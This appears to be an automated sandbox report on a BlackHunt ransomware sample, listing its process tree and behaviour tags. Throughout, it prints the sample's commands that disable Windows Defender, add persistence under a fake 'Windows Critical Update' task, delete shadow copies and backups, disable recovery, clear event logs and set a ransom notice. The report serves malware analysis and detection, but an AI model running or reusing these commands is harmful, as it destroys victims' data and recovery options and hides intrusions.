fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 119 PID 3220 wrote to memory of 4064 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 119 PID 2768 wrote to memory of 1704 2768 cmd.exe 122 PID 2768 wrote to memory of 1704 2768 cmd.exe 122 PID 3220 wrote to memory of 1020 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 121 PID 3220 wrote to memory of 1020 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 121 PID 3220 wrote to memory of 756 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 124 PID 3220 wrote to memory of 756 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 124 PID 1436 wrote to memory of 1804 1436 cmd.exe 126 PID 1436 wrote to memory of 1804 1436 cmd.exe 126 PID 3220 wrote to memory of 468 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 127 PID 3220 wrote to memory of 468 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 127 PID 1864 wrote to memory of 3180 1864 cmd.exe 128 PID 1864 wrote to memory of 3180 1864 cmd.exe 128 PID 3220 wrote to memory of 5064 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 130 PID 3220 wrote to memory of 5064 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 130 PID 3220 wrote to memory of 4032 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 132 PID 3220 wrote to memory of 4032 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 132 PID 4064 wrote to memory of 816 4064 cmd.exe 131 PID 4064 wrote to memory of 816 4064 cmd.exe 131 PID 1020 wrote to memory of 3100 1020 cmd.exe 134 PID 1020 wrote to memory of 3100 1020 cmd.exe 134 PID 3220 wrote to memory of 2144 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 137 PID 3220 wrote to memory of 2144 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 137 PID 756 wrote to memory of 2256 756 cmd.exe 136 PID 756 wrote to memory of 2256 756 cmd.exe 136 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe"C:\Users\Admin\AppData\Local\Temp\fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:468
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:5064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3292
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe" /F2⤵PID:3364
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe" /F3⤵
- Creates scheduled task(s)
PID:5504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1720
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:9092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:760
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3032
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3368
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4036
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4428
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2548
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:14400
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:7224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:15320
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:7156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:13676
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:14632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:16084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:9272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5252
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:300
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:14900
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:15012
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3608
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6076
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:7348
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5988
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:13056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10404
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:15540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:7084
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:15532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7088
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:15468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:10044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3464
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13972
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:15484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe"2⤵PID:10064
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:15392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5748 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:10416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10416 -s 14164⤵
- Program crash
PID:15848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5520
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:9960
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10196
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
